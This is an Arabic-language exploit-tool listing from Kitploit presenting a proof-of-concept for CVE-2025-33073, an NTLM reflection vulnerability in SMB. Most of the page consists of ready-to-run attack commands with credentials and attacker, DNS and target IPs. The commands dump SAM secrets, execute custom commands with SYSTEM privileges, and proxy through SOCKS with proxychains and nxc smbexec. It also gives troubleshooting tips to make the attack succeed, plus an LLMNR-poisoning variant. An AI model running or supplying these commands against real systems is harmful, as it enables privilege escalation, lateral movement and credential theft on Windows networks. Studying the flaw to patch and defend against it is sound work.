Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/starscow/cve-2025-33073
تحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةما بعد الاستغلالاختبار الاختراقالفريق الأحمر
GitHubstarscow/cve-2025-33073

CVE-2025-33073

إثبات المفهوم (PoC) لاستغلال ثغرة انعكاس NTLM في بروتوكول SMB.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-33073

استغلال PoC لثغرة انعكاس NTLM في SMB.

كل الفضل يعود للبحث الرسمي:
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

المتطلبات الأساسية

نظام التشغيل: Kali Linux (يحتوي على معظم الحزم مثبتة مسبقًا).

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py (مضمّن في المستودع)
  • xterm (للواجهة الرسومية فقط)

مثال على الاستخدام

الواجهة الرسومية (GUI)

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

image

واجهة سطر الأوامر (CLI)

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

image

أمر مخصص
بدلاً من تشغيل secretsdump يمكن تنفيذ أمر مخصص.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

image

SOCKS
لتنفيذ أوامر أكثر تمويهًا بعد إنشاء اتصال صالح بصلاحيات SYSTEM. يجب أن يكون --target و --target-ip متساويين هنا.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

image يمكن أيضًا تشغيل أمر مخصص عبر proxychains بدلاً من تفريغ SAM.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

image

استغلال يدوي بدون الحاجة إلى DNS

إذا كنت في نفس نطاق البث (broadcast domain) الخاص بالجهاز وكان الجهاز عرضة لتسميم LLMNR فمن الممكن استغلال جهاز دون الحاجة إلى تسجيل سجل DNS.

image

استكشاف الأخطاء وإصلاحها

  • لاحظت أن الهجوم قد لا يعمل أحيانًا لأن اسم المضيف يُستخدم في الهجوم مما يؤدي إلى استعلام DNS من Kali. إذا كان Kali لا يستخدم خادم DNS أو تلقيت رسالة '/ FAILED' من impacket-ntlmrelayx فجرّب إضافة المضيف إلى ملف /etc/hosts لديك. يجب أن يؤدي ذلك إلى نجاح الهجوم.
  • إذا كنت تستخدم عنوان IP فيجب أن يعمل الهجوم. أحيانًا يؤدي تشغيله عدة مرات إلى نجاح SUCCESS بدلاً من الفشل. حتى الآن ليس من الواضح تمامًا سبب حدوث ذلك. أعتقد أن الأمر له علاقة بالشبكات.
  • جرّب طريقة إكراه أخرى باستخدام -M أو --method.

Wireshark

مصادقة NTLM المحلية تتم image

مصادقة NTLM المحلية لا تتم مما يؤدي إلى محاولة فاشلة FAILED image

من الجيد معرفته

  • يتيح xterm النسخ واللصق باستخدام زر الفأرة الأوسط.
  • يجب أن يكون سجل DNS معروفًا أيضًا للعميل، وقد يستغرق ذلك وقتًا أطول في بعض الحالات. بما أعنيه بالوقت الأطول هو إعطاؤه بضع دقائق.
  • هذا مجرد PoC مما يعني أنه لم يتم تجربة تجاوز برامج مكافحة الفيروسات/EDR. استخدمه على مسؤوليتك الخاصة.

كيفية الإصلاح

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073

تنزيل الأداة